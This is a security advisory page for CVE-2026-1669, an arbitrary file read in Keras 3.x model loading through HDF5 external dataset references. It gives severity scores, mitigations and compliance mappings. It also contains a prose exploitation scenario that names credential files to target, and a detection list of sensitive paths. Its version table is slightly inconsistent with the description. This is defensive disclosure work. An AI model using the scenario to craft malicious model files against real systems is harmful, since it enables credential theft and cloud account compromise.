CVE-2026-1669

GHSA-3m4q-jmj6-r34q HIGH
Published February 11, 2026
CISO Take

CVE-2026-1669 is a high-severity arbitrary file read in Keras 3.0.0–3.13.1 that requires no authentication or user interaction to exploit. Any system that loads .keras model files from untrusted sources — model APIs, MLOps pipelines, collaborative ML platforms — is at risk of credential and secrets exposure. Patch to a fixed Keras version immediately and enforce trusted-source-only model loading across all inference and training infrastructure.

Affected Systems

Package Ecosystem Vulnerable Range Patched
keras pip >= 3.13.0, < 3.13.2 3.13.2
keras pip No patch

Severity & Risk

CVSS 3.1
7.5 / 10
EPSS
0.0%
chance of exploitation in 30 days
KEV Status
Not in KEV
Sophistication
Trivial

Recommended Action

  1. 1. PATCH: Upgrade Keras beyond 3.13.1 to the fixed release as soon as available. Monitor the official Keras changelog and GitHub advisory. 2. WORKAROUND (if patch unavailable): Implement a custom model loading wrapper that strips or rejects HDF5 external dataset references before passing to Keras. 3. MODEL SOURCE CONTROL: Enforce cryptographic signing or hash verification for all model files loaded in production. Reject models from unverified sources at the pipeline ingestion layer. 4. LEAST PRIVILEGE: Run model loading processes with a restricted filesystem view (container with read-only mounts, seccomp profiles) limiting accessible paths. 5. DETECTION: Alert on file read syscalls from Python/ML processes accessing sensitive paths (/etc, ~/.aws, .env, *.pem, *.key) during model loading operations. Deploy eBPF-based runtime monitoring (Falco or similar) on ML inference nodes. 6. AUDIT: Inventory all Keras versions deployed across training, serving, and evaluation environments — include transitive dependencies via pip freeze.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity Article 9 - Risk management system
ISO 42001
A.6.1.2 - AI risk assessment A.6.1.3 - AI system supply chain A.8.3 - AI system security A.8.4 - AI system resources — data and tools for AI system
NIST AI RMF
GOVERN 1.4 - Organizational teams are committed to a culture that considers and communicates AI risk GOVERN 1.7 - Processes for AI risk — third-party dependencies MANAGE 2.2 - Mechanisms to sustain AI risk management
OWASP LLM Top 10
LLM03:2025 - Supply Chain Vulnerabilities LLM04 - Model Supply Chain

Technical Details

NVD Description

Arbitrary file read in the model loading mechanism (HDF5 integration) in Keras versions 3.0.0 through 3.13.1 on all supported platforms allows a remote attacker to read local files and disclose sensitive information via a crafted .keras model file utilizing HDF5 external dataset references.

Exploitation Scenario

Adversary crafts a .keras model file embedding HDF5 external dataset references pointing to high-value local paths: /proc/1/environ (environment variables), ~/.aws/credentials, /run/secrets/*, or .env files common in Dockerized ML services. The file is published to a public model hub (e.g., HuggingFace) masquerading as a legitimate fine-tuned model, or submitted via a model evaluation API endpoint. When the target's automated pipeline or ML engineer calls keras.models.load_model() on this file, Keras resolves the external HDF5 references and reads the local files. In an inference API context, the resolved file contents surface in model metadata or error responses, disclosing credentials. An attacker with read access to cloud provider keys achieves full cloud account compromise from a single model file download.

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Timeline

Published
February 11, 2026
Last Modified
February 26, 2026
First Seen
February 11, 2026